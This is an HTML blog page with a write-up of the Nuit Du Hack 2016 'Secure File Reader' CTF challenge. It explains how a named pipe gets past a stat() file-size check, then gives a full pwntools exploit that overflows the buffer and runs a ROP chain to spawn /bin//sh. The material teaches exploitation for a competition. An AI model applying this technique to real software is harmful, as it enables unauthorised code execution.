<html>
 <head>
<title> Secure file reader ctf writeup </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Blog </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Secure File Reader - Nuit Du Hack 2016 </h1>
   
 <br> 

<p>This question was something different , it reads the data from a file and then copy it to a buffer .. so to reach eip you need 4124 byte but it uses stat() func <br>
    to check if file size < 4095 byte . So trick stat() we can use <br> <b>1) Race condition <br> 2)Named pipes a.k.a FIFO file structure</b> whose size is always 0 .<br>
    The later is easy and reliable so i choose that .. So redirect the paylod via pipe  and then do rop chain ...</p>

<code>
from pwn import *
from subprocess import call
import time
def send_payload(payload) :
    with open('imp','wb') as f 	:
         f.write(payload)
         call(['cat imp > mypipe'],shell=True)
   
call(['mkfifo', 'mypipe'])

p = 'A'*4124

p += pack(0x0807270a) # pop edx ; ret
p += pack(0x080ee060) # @ .data
p += pack(0x080beb26) # pop eax ; ret
p += '/bin'
p += pack(0x0809dead) # mov dword ptr [edx], eax ; ret
p += pack(0x0807270a) # pop edx ; ret
p += pack(0x080ee064) # @ .data + 4
p += pack(0x080beb26) # pop eax ; ret
p += '//sh'
p += pack(0x0809dead) # mov dword ptr [edx], eax ; ret
p += pack(0x0807270a) # pop edx ; ret
p += pack(0x080ee068) # @ .data + 8
p += pack(0x0806fab8) # xor eax, eax ; ret
p += pack(0x0809dead) # mov dword ptr [edx], eax ; ret
p += pack(0x080481d1) # pop ebx ; ret
p += pack(0x080ee060) # @ .data
p += pack(0x08072731) # pop ecx ; pop ebx ; ret
p += pack(0x080ee068) # @ .data + 8
p += pack(0x080ee060) # padding without overwrite ebx
p += pack(0x0807270a) # pop edx ; ret
p += pack(0x080ee068) # @ .data + 8
p += pack(0x0806fab8) # xor eax, eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x0807f15f) # inc eax ; ret
p += pack(0x08049501) # int 0x80


r=process(['pwn','mypipe'])

time.sleep(1)

send_payload(p)

r.interactive()


#print p

</code>


</body>
</html>